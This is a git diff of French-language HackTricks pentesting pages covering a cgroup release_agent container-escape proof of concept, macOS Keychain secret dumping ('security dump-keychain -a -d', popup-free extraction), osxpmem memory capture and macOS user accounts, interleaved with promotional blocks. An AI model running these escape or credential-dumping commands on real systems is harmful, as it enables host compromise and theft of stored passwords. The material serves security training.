<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks:
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
@ -47,14 +47,14 @@ La preuve de concept (PoC) démontre une méthode pour exploiter les cgroups en
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
```
2. **Configurer le sous-cgroupe enfant :**
- Un sous-cgroupe nommé "x" est créé dans le répertoire de cgroup monté.
- Un sous-cgroupe nommé "x" est créé à l'intérieur du répertoire de cgroup monté.
- Les notifications sont activées pour le sous-cgroupe "x" en écrivant 1 dans son fichier notify_on_release.
```shell
echo 1 > /tmp/cgrp/x/notify_on_release
```
3. **Configurer l'Agent de Libération :**
- Le chemin du conteneur sur l'hôte est obtenu à partir du fichier /etc/mtab.
- Le fichier release_agent du cgroup est ensuite configuré pour exécuter un script nommé /cmd situé dans le chemin d'accès de l'hôte acquis.
- Le fichier release_agent du cgroup est ensuite configuré pour exécuter un script nommé /cmd situé dans le chemin de l'hôte acquis.
```shell
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
@ -72,9 +72,9 @@ chmod a+x /cmd
```shell
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**.
@ -90,10 +90,10 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,4 +1,4 @@
# Trousseau macOS
# macOS Keychain
<details>
@ -6,17 +6,17 @@
Autres façons de soutenir HackTricks :
- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -30,56 +30,56 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
## Principaux trousseaux
- Le **trousseau utilisateur** (`~/Library/Keychains/login.keycahin-db`), qui est utilisé pour stocker les **informations d'identification spécifiques à l'utilisateur** telles que les mots de passe d'application, les mots de passe Internet, les certificats générés par l'utilisateur, les mots de passe réseau et les clés publiques/privées générées par l'utilisateur.
- Le **trousseau système** (`/Library/Keychains/System.keychain`), qui stocke les **informations d'identification à l'échelle du système** telles que les mots de passe WiFi, les certificats racine du système, les clés privées du système et les mots de passe d'application du système.
* Le **trousseau utilisateur** (`~/Library/Keychains/login.keycahin-db`), qui est utilisé pour stocker les **informations d'identification spécifiques à l'utilisateur** telles que les mots de passe d'application, les mots de passe Internet, les certificats générés par l'utilisateur, les mots de passe réseau et les clés publiques/privées générées par l'utilisateur.
* Le **trousseau système** (`/Library/Keychains/System.keychain`), qui stocke les **informations d'identification à l'échelle du système** telles que les mots de passe WiFi, les certificats racine du système, les clés privées du système et les mots de passe d'application du système.
### Accès au trousseau de mots de passe
Ces fichiers, bien qu'ils ne bénéficient pas d'une protection inhérente et puissent être **téléchargés**, sont chiffrés et nécessitent le **mot de passe en clair de l'utilisateur pour être déchiffrés**. Un outil comme [**Chainbreaker**](https://github.com/n0fate/chainbreaker) pourrait être utilisé pour le déchiffrement.
Ces fichiers, bien qu'ils n'aient pas de protection inhérente et puissent être **téléchargés**, sont chiffrés et nécessitent le **mot de passe en clair de l'utilisateur pour être déchiffrés**. Un outil comme [**Chainbreaker**](https://github.com/n0fate/chainbreaker) pourrait être utilisé pour le déchiffrement.
## Protections des entrées du trousseau
### ACLs
### ACL
Chaque entrée dans le trousseau est régie par des **listes de contrôle d'accès (ACL)** qui dictent qui peut effectuer diverses actions sur l'entrée du trousseau, notamment :
- **ACLAuhtorizationExportClear** : Permet au détenteur d'obtenir le texte en clair du secret.
- **ACLAuhtorizationExportWrapped** : Permet au détenteur d'obtenir le texte en clair chiffré avec un autre mot de passe fourni.
- **ACLAuhtorizationAny** : Permet au détenteur d'effectuer n'importe quelle action.
* **ACLAuhtorizationExportClear** : Permet au détenteur d'obtenir le texte en clair du secret.
* **ACLAuhtorizationExportWrapped** : Permet au détenteur d'obtenir le texte en clair chiffré avec un autre mot de passe fourni.
* **ACLAuhtorizationAny** : Permet au détenteur d'effectuer n'importe quelle action.
Les ACL sont accompagnées d'une **liste d'applications de confiance** qui peuvent effectuer ces actions sans invitation. Cela pourrait être :
- &#x20;**N`il`** (aucune autorisation requise, **tout le monde est de confiance**)
- Une liste **vide** (personne n'est de confiance)
- Liste d'applications **spécifiques**.
* &#x20;**N`il`** (aucune autorisation requise, **tout le monde est de confiance**)
* Une liste **vide** (personne n'est de confiance)
* Liste d'applications **spécifiques**.
De plus, l'entrée peut contenir la clé **`ACLAuthorizationPartitionID`,** qui est utilisée pour identifier le **teamid, apple,** et **cdhash.**
- Si le **teamid** est spécifié, alors pour **accéder à la valeur de l'entrée** sans **invitation**, l'application utilisée doit avoir le **même teamid**.
- Si l'**apple** est spécifié, alors l'application doit être **signée** par **Apple**.
- Si le **cdhash** est indiqué, alors l'**application** doit avoir le **cdhash** spécifique.
* Si le **teamid** est spécifié, alors pour **accéder à la valeur de l'entrée** sans **invitation**, l'application utilisée doit avoir le **même teamid**.
* Si l'**apple** est spécifié, alors l'application doit être **signée** par **Apple**.
* Si le **cdhash** est indiqué, alors l'application doit avoir le **cdhash** spécifique.
### Création d'une entrée de trousseau
Lorsqu'une **nouvelle** **entrée** est créée à l'aide de **`Keychain Access.app`**, les règles suivantes s'appliquent :
Lorsqu'une **nouvelle** **entrée** est créée en utilisant **`Keychain Access.app`**, les règles suivantes s'appliquent :
- Toutes les applications peuvent chiffrer.
- Aucune application ne peut exporter/déchiffrer (sans inviter l'utilisateur).
- Toutes les applications peuvent voir le contrôle d'intégrité.
- Aucune application ne peut modifier les ACL.
- L'**ID de partition** est défini sur **`apple`**.
* Toutes les applications peuvent chiffrer.
* Aucune application ne peut exporter/déchiffrer (sans inviter l'utilisateur).
* Toutes les applications peuvent voir le contrôle d'intégrité.
* Aucune application ne peut modifier les ACL.
* L'**ID de partition** est défini sur **`apple`**.
Lorsqu'une **application crée une entrée dans le trousseau**, les règles sont légèrement différentes :
- Toutes les applications peuvent chiffrer.
- Seule l'**application créatrice** (ou toute autre application ajoutée explicitement) peut exporter/déchiffrer (sans inviter l'utilisateur).
- Toutes les applications peuvent voir le contrôle d'intégrité.
- Aucune application ne peut modifier les ACL.
- L'**ID de partition** est défini sur **`teamid:[teamID ici]`**.
* Toutes les applications peuvent chiffrer.
* Seule l'**application créatrice** (ou toute autre application ajoutée explicitement) peut exporter/déchiffrer (sans inviter l'utilisateur).
* Toutes les applications peuvent voir le contrôle d'intégrité.
* Aucune application ne peut modifier les ACL.
* L'**ID de partition** est défini sur **`teamid:[teamID ici]`**.
## Accès au trousseau
### `sécurité`
### `security`
```bash
# Dump all metadata and decrypted secrets (a lot of pop-ups)
security dump-keychain -a -d
@ -93,12 +93,12 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
### APIs
{% hint style="success" %}
L'**énumération et l'extraction** des secrets du trousseau qui **ne généreront pas de fenêtre contextuelle** peuvent être effectuées avec l'outil [**LockSmith**](https://github.com/its-a-feature/LockSmith)
La **numérotation et l'extraction** des secrets du trousseau qui **ne généreront pas de fenêtre contextuelle** peuvent être effectuées avec l'outil [**LockSmith**](https://github.com/its-a-feature/LockSmith)
{% endhint %}
Listez et obtenez des **informations** sur chaque entrée du trousseau :
* L'API **`SecItemCopyMatching`** fournit des informations sur chaque entrée et il existe quelques attributs que vous pouvez définir lors de son utilisation :
* L'API **`SecItemCopyMatching`** donne des informations sur chaque entrée et il existe quelques attributs que vous pouvez définir lors de son utilisation :
* **`kSecReturnData`** : Si vrai, il tentera de décrypter les données (définissez-le sur faux pour éviter les fenêtres contextuelles potentielles)
* **`kSecReturnRef`** : Obtenez également la référence de l'élément du trousseau (définissez-le sur vrai au cas où vous pourriez décrypter sans fenêtre contextuelle)
* **`kSecReturnAttributes`** : Obtenez des métadonnées sur les entrées
@ -109,7 +109,7 @@ Obtenez les **ACL** de chaque entrée :
* Avec l'API **`SecAccessCopyACLList`** vous pouvez obtenir l'**ACL de l'élément du trousseau**, et il renverra une liste d'ACL (comme `ACLAuhtorizationExportClear` et les autres mentionnés précédemment) où chaque liste a :
* Description
* **Liste d'applications de confiance**. Cela pourrait être :
* Liste d'applications de confiance. Cela pourrait être :
* Une application : /Applications/Slack.app
* Un binaire : /usr/libexec/airportd
* Un groupe : group://AirPort
@ -122,7 +122,7 @@ Exportez les données :
Et voici les **conditions** pour pouvoir **exporter un secret sans fenêtre contextuelle** :
* Si **1+ applications de confiance** sont répertoriées :
* Besoin des **autorisations appropriées** (**`Nil`**, ou être **partie** de la liste autorisée d'applications dans l'autorisation pour accéder aux informations secrètes)
* Besoin des **autorisations appropriées** (**`Nil`**, ou faire **partie** de la liste autorisée d'applications dans l'autorisation pour accéder aux informations secrètes)
* Besoin que la signature de code corresponde à **PartitionID**
* Besoin que la signature de code corresponde à celle d'une **application de confiance** (ou être membre du bon KeychainAccessGroup)
* Si **toutes les applications sont de confiance** :
@ -133,7 +133,7 @@ Et voici les **conditions** pour pouvoir **exporter un secret sans fenêtre cont
{% hint style="danger" %}
Par conséquent, s'il y a **1 application répertoriée**, vous devez **injecter du code dans cette application**.
Si **apple** est indiqué dans le **PartitionID**, vous pourriez y accéder avec **`osascript`** pour tout ce qui fait confiance à toutes les applications avec apple dans le PartitionID. **`Python`** pourrait également être utilisé pour cela.
Si **apple** est indiqué dans le **partitionID**, vous pourriez y accéder avec **`osascript`** pour tout ce qui fait confiance à toutes les applications avec apple dans le partitionID. **`Python`** pourrait également être utilisé pour cela.
{% endhint %}
### Deux attributs supplémentaires
@ -146,13 +146,13 @@ Si **apple** est indiqué dans le **PartitionID**, vous pourriez y accéder avec
* [**#OBTS v5.0 : "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
@ -167,7 +167,7 @@ Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF** Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe telegram](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -2,21 +2,21 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -46,7 +46,7 @@ Il convient de noter que sur les systèmes MacOS modernes, ce fichier est géné
Un autre fichier important lié à la mémoire dans les systèmes MacOS est le **journal de pression mémoire**. Ces journaux se trouvent dans `/var/log` et contiennent des informations détaillées sur l'utilisation de la mémoire du système et les événements de pression. Ils peuvent être particulièrement utiles pour diagnostiquer des problèmes liés à la mémoire ou comprendre comment le système gère la mémoire au fil du temps.
## Extraction de la mémoire avec osxpmem
## Extraction de mémoire avec osxpmem
Pour extraire la mémoire d'une machine macOS, vous pouvez utiliser [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
@ -58,7 +58,7 @@ sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
#Dump aff4 format
sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4
```
Si vous rencontrez cette erreur : `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` Vous pouvez la corriger en effectuant :
Si vous rencontrez cette erreur : `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` Vous pouvez le résoudre en faisant :
```bash
sudo cp -r osxpmem.app/MacPmem.kext "/tmp/"
sudo kextutil "/tmp/MacPmem.kext"
@ -76,13 +76,13 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
```
{% endcode %}
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations.
Leur objectif principal est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
@ -90,7 +90,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge HackTricks AWS)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :

View file

@ -2,27 +2,27 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
Autres façons de soutenir HackTricks:
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
Vous pouvez consulter leur site Web et essayer leur moteur gratuitement sur :
{% embed url="https://whiteintel.io" %}
@ -30,12 +30,12 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
### Utilisateurs Courants
* **Daemon** : Utilisateur réservé aux démons système. Les noms de compte de démon par défaut commencent généralement par un "\_":
* **Daemon**: Utilisateur réservé aux démons système. Les noms de compte de démon par défaut commencent généralement par un "\_":
```bash
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
```
* **Invité** : Compte pour les invités avec des autorisations très strictes
* **Guest**: Compte pour les invités avec des autorisations très strictes
{% code overflow="wrap" %}
```bash
@ -47,23 +47,9 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
* **Personne**: Les processus sont exécutés avec cet utilisateur lorsque des autorisations minimales sont requises
* **Root**
### Privilèges des utilisateurs
### Privilèges Utilisateur
* **Utilisateur standard**: Le plus basique des utilisateurs. Cet utilisateur a besoin d'autorisations accordées par un utilisateur administrateur lorsqu'il tente d'installer un logiciel ou d'effectuer d'autres tâches avancées. Ils ne peuvent pas le faire par eux-mêmes.
* **Utilisateur administrateur**: Un utilisateur qui opère la plupart du temps en tant qu'utilisateur standard mais qui est également autorisé à effectuer des actions root telles que l'installation de logiciels et d'autres tâches administratives. Tous les utilisateurs appartenant au groupe admin **ont accès à root via le fichier sudoers**.
* **Root**: Root est un utilisateur autorisé à effectuer presque n'importe quelle action (il existe des limitations imposées par des protections comme la Protection de l'intégrité du système).
* **Utilisateur Standard**: Le plus basique des utilisateurs. Cet utilisateur a besoin d'autorisations accordées par un utilisateur administrateur lorsqu'il tente d'installer un logiciel ou d'effectuer d'autres tâches avancées. Ils ne peuvent pas le faire par eux-mêmes.
* **Utilisateur Administrateur**: Un utilisateur qui opère la plupart du temps en tant qu'utilisateur standard mais qui est également autorisé à effectuer des actions root telles que l'installation de logiciels et d'autres tâches administratives. Tous les utilisateurs appartenant au groupe admin **ont accès à root via le fichier sudoers**.
* **Root**: Root est un utilisateur autorisé à effectuer presque n'importe quelle action (il existe des limitations imposées par des protections comme la Protection de l'Intégrité du Système).
* Par exemple, root ne pourra pas placer un fichier à l'intérieur de `/System`
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks:
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,4 +1,4 @@
# Inversion de bibliothèques natives
# Inversion des bibliothèques natives
<details>
@ -14,9 +14,9 @@ Autres façons de soutenir HackTricks :
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -51,7 +51,7 @@ Les applications Android peuvent utiliser des bibliothèques natives, générale
- **Liaison des méthodes Java aux fonctions natives :**
- **Liaison dynamique :** Les noms de fonction dans les bibliothèques natives correspondent à un motif spécifique, permettant une liaison automatique.
